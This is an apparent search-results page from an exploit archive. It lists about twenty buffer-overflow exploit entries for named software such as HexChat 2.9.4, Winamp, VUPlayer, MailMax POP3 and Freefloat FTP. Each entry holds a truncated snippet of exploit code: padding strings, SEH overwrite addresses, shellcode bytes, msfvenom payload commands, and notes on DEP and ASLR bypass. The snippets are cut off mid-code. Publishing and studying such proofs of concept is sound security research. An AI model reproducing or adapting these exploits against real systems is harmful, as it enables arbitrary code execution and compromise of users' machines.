7259 matches found
HexChat-2.9.4-Local-Exploit
HexChat 2.9.4 Local Exploit. Bug found by Jules Carter @iMulitia. Exploit by Matt "hostess" Andreko mandreko at accuvant.com http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html junk1 = "B"*30 shellcode = msfvenom -p windows/messagebox EXITFUNC=process BufferRegister=ESP -e...
VirtualDJ-ProHome-7.3
Exploit Author: Alexandro Sánchez Bach functionmixer.blogspot.com Vendor Homepage: http://www.virtualdj.com/ Software Link: http://www.filehippo.com/en/downloadvirtualdj/14361/ Version: VirtualDJ Pro/Home 7.3 def encodeData(decoder, data, validValues): assert data.find("\0") == -1, "Shellcode must be...
aSc-Timetables-2013
The buffer overflow vulnerability resides in the Add subject functionality, and it is triggered when the user submits a large string when specifying the school subject name. To trigger the vulnerability go to the main menu, select subjects, click new, then generate a string with the code belo...
Adrenalin-Player-2.2.5.3-(.asx)-
Title: Adrenalin Player .asx - SEH Buffer Overflow software: Adrenalin Player version: 2.2.5.3 Platform: Windows XP sp3 Date: June 18th, 2013 header=" " junk= "\x90"*2079 junk+="\xeb\x06\x90\x90" # jmp short junk+="\x13\xf3\x16\x10" # POP POP RETN AdrenalinX.dll junk+="\x90"*16 # NOP padding before...
Winamp-5.1x-(.m3u)
Stack-based buffer overflow in Nullsoft Winamp 5.12 and 5.13 allows user-assisted attackers to cause a denial of service crash and possibly execute arbitrary code via a crafted .m3u file that causes an incorrect strncpy function call when the player pauses or stops the file. import struct header ...
BOINC-Manager-7.0.64
BOINC is a program that lets you donate your idle computer time to science projects like SETI@home, Climateprediction.net, Rosetta@home, World Community Grid, and many others. In order to exploit the vulnerability, the attacker must convince the victim to use the very long URL as Account Manager...
Ophcrack-3.5.0---Local-Code
Exploit Author: xisone@STM Solutions Vendor Homepage: http://ophcrack.sourceforge.net/ Software Link: http://downloads.sourceforge.net/ophcrack/ophcrack-win32-installer-3.5.0.exe Version: 3.5.0 shellcode = windows/exec EXITFUNC=seh CMD=calc R | msfencode -e x86/alphamixed bufferregister=esp -t c...
No-IP-Dynamic-Update-Client-
This exploit covers a stack-based overflow present in the -i parameter (the IPaddress variable in the source code). It is probably the most basic parameter, as this is the way to tell the client that our IP has changed. import os binary = "./noip-2.1.9-1/binaries/noip2-i686" shellcode =...
Easy-LAN-Folder-Share-3.2.0-SEH
The registration code field in the 'activate license' window is vulnerable to a buffer overflow. This script generates a malicious registry file. Once the generated file has been loaded into the registry, execute the application as normal. header = "Windows Registry Editor Version 5.00\n\n" heade...
BlazeDVD-Pro-player-6.1-Stack-Based-Buffer
BlazeDVD Pro player 6.1 Local stack based buffer overflow Author: PuN1sh3r Email: [email protected] Date: Mon Jul 15 03:01:37 EDT 2013 Vendor link: http://www.blazevideo.com/download.htmm Software Link: http://www.blazevideo.com/download.php?product=BlazeDVDPro App Version: 6.1 $file =...
Adrenalin-Player-2.2.5.3-.wvx-SEH
Exploit Title: Adrenalin Player 2.2.5.3 .wvx SEH-Buffer Overflow Date: 7/1/2013 Exploit Author: MrXors Vendor HomePage: http://software.naver.com/software/summary.nhn?softwareId=MFS100099 Software Link: http://software.naver.com/software/summary.nhn?softwareId=MFS100099 Version App: 2.2.5.3...
VUPlayer-2.49-(.M3U)-DEP-Bypass
VUPlayer 2.49 .M3U Exploit: Universal buffer overflow/DEP bypass Download: http://vuplayer.com/ Tested on Windows XP SP3 DEP: OptOut import struct p = open("ExploitVirtualProtect.m3u", "w") crash = "\x41"*1012 sc = "\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49"...
VCDGear-3.50---(.cue)
Description: VCDGEAR 3.50 is prone to a stack-based buffer overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied input. An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will...
MP3Info-0.8.5a---SEH
The process memory region starts with a null byte, but exploitation is still possible because of the little-endian architecture, provided that the return address is placed at the end of the buffer; this, however, confines us to the tiny 4-byte area after pop/pop/retn. Using a couple of trampolines I...
MailMax-4.6-POP3-
MailMax v4.6 POP3 "USER" Remote Buffer Overflow Exploit. No Login Needed. Newer versions not tested, maybe vulnerable too. A hard one this, the shellcode MUST be lowercase. Plus there are many opcodes that break the payload and opcodes that get changed, like "\xc3" gets converted to "\xe3", and...
Freefloat-FTP-Server-PUT
In my disclosure to FreeFloat, I reported my discovery and notified them that other exploits for various FTP commands supported by the FreeFloat FTP existed on the internet, just to be assured they knew, as SecPod reported their findings last year. They responded and acknowledged my discovered...
BigAnt-Server-2.52-SP5-SEH
Exploit Title: BigAnt Server 2.52 SP5 SEH Stack Overflow ROP-based exploit ASLR + DEP bypass Date: 03/11/2012 Exploit Author: Lorenzo Cantoni Vendor Homepage: http://www.bigantsoft.com/ Version: BigAnt Console 2.52 SP5 Tested on: Windows 7 SP0 x86 Italian - expsrv.dll 6.0.9589 Info: Vulnerability...
MinaliC-Webserver-2.0.0
Exploit Title: MinaliC Webserver buffer overflow Date: 12 Apr 2013 Exploit Author: superkojiman - http://www.techorganic.com Vendor Homepage: http://minalic.sourceforge.net/ Version: MinaliC Webserver 2.0.0 import socket import struct 74 bytes calc.exe from...
Bifrost-1.2.1-Remote-Buffer-OverFlow
Bifrost contains an overflow condition that is triggered as user-supplied input is not properly validated when handling specially crafted commands. This may allow a remote attacker to cause a buffer overflow, allowing the execution of arbitrary code. import socket from time import sleep from...
haneWIN-DNS-Server-1.5.3
Description: A SEH overflow occurs when a large amount of data is sent to the server Author: Dario Estrada dash https://intrusionlabs.org Date: 2014-01-29 Version: haneWIN DNS Server 1.5.3 Vendor Homepage: http://www.hanewin.net/ Vulnerable app link: http://www.hanewin.net/dns-e.htm import socket,...